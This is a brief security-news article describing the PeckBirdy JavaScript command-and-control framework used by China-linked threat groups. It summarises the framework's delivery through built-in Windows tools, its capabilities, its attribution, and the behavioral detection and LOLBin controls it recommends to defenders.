China-Linked Hackers Have Used the PeckBirdy JavaScript C2 Framework Since 2023

The emergence of script‑based command‑and‑control frameworks marks a shift in how nation‑state actors evade traditional defenses. PeckBirdy, discovered by Trend Micro, is built on JScript—a legacy language that can be executed through a wide range of living‑off‑the‑land binaries such as MSHTA, WScript, and classic ASP. By leveraging these LOLBins, attackers can launch the framework on Windows, browsers, Node JS, or .NET environments without dropping a standalone executable. This cross‑platform agility reduces the need for custom implants and makes detection harder for endpoint tools that rely on file‑based signatures.

Technically, PeckBirdy operates through a configurable API that returns a unique 32‑character ATTACK ID, allowing the server to deliver context‑specific payloads. After the initial script determines its execution host, it establishes a communication channel—preferably WebSocket, with Adobe Flash ActiveX or Comet as fallbacks. The second‑stage scripts can harvest cookies, exploit the V8 engine vulnerability (CVE‑2020‑16040), present social‑engineering pop‑ups, or spawn reverse shells via TCP. Notably, the framework also serves modular .NET backdoors named HOLODONUT and MKDOOR, which can load, execute, or uninstall additional plugins on demand.

The attribution trail ties SHADOW‑VOID‑044 and SHADOW‑EARTH‑045 to multiple China‑aligned groups, including UNC3569, APT41, and the Earth Lusca family, highlighting a collaborative ecosystem that reuses code and infrastructure. For defenders, the key challenge is the lack of persistent file artifacts; PeckBirdy lives entirely in memory and injects code at runtime. Effective mitigation therefore requires behavioral analytics, network traffic inspection for anomalous WebSocket or COMET patterns, and strict control of LOLBin execution. As script‑centric C2 becomes more prevalent, organizations must broaden their detection playbooks beyond traditional binary‑focused solutions.